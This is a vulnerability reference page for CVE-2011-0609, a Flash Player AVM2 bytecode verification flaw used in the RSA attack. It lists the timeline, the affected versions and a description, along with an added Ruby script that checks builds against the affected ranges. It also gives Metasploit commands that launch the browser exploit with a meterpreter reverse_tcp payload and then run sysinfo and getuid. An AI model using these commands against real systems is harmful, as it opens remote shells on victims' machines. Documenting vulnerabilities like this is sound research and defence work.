CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

Timeline :

Vulnerability discovered being exploited in the wild
This vulnerability was used in the attack against RSA
First information about the 0day published on 2011-03-11
Security Advisory APSA11-01 posted by the vendor on 2011-03-14
First vulnerability analysis provided by villy on 2011-03-15
Metasploit PoC provided by bannedit on 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh
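A quick triage check against the affected ranges above, added here as an example (it is not part of the page, the advisory or the Metasploit module). It takes the product build number as reported by the client (for Flash, the string Flash reports to the browser; for Reader, the build in Help > About) and tells whether it falls inside one of the listed "X and earlier" ranges. The numbers are compared field by field as integers, since a plain string comparison puts 10.2.152.9 after 10.2.152.33 and would miss a vulnerable build. The platform symbols and the version strings used in the usage lines are assumptions for the example.

```ruby
# Added example: is a reported Flash Player / Reader build inside the
# affected ranges listed in this page? (Illustrative code, not from the
# advisory or the Metasploit module.)

# platform => highest affected build ("X and earlier versions")
AFFECTED_MAX = {
  flash_desktop: "10.2.152.33",  # Windows, Macintosh, Linux, Solaris
  flash_chrome:  "10.2.154.18",  # Flash bundled with Chrome
  flash_android: "10.1.106.16",  # Android
  reader:        "10.0.1",       # Reader/Acrobat X; earlier 10.x and 9.x too
}.freeze

# Lowest affected major release per platform (the page lists 9.x and
# 10.x for Reader/Acrobat; only 10.x Flash builds are listed for Flash).
AFFECTED_MIN_MAJOR = {
  flash_desktop: 10,
  flash_chrome:  10,
  flash_android: 10,
  reader:        9,
}.freeze

# Turn "10.2.152.26" into [10, 2, 152, 26]; reject anything that is not a
# dotted run of integers so garbage never silently compares as "older".
def version_key(str)
  raise ArgumentError, "bad version string: #{str.inspect}" unless str =~ /\A\d+(\.\d+)*\z/
  str.split(".").map(&:to_i)
end

# true when the build is within the affected range for the platform.
# Array#<=> compares element by element, so 10.2.152.9 < 10.2.152.33
# and 10.0 < 10.0.1, which is exactly "X and earlier" semantics.
def affected?(platform, version)
  key = version_key(version)
  return false if key.first < AFFECTED_MIN_MAJOR.fetch(platform)
  (key <=> version_key(AFFECTED_MAX.fetch(platform))) <= 0
end

# One-line verdict for a list of (platform, version) pairs pulled from an
# inventory; the sample pairs below are constructed for the example.
def triage(pairs)
  pairs.map do |platform, version|
    status = affected?(platform, version) ? "AFFECTED" : "not affected"
    "#{platform} #{version}: #{status}"
  end
end

if __FILE__ == $0
  puts triage([
    [:flash_desktop, "10.2.152.26"],  # the build this page was tested on
    [:flash_desktop, "10.2.152.9"],   # lexical compare would get this wrong
    [:flash_desktop, "10.2.153.1"],   # above the listed ceiling
    [:reader,        "9.4.2"],
    [:reader,        "10.0.2"],
  ])
end
```

The check only tells you whether a build is in the range the advisory lists; it says nothing about whether a host was actually hit, which is a question for the browser and Reader process history on that host.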

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript 3 AVM2 verification logic. This results in unsafe JIT (Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory it's fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

Long time (the exploit takes a while to trigger; wait for the session to come back)

sysinfo
getuid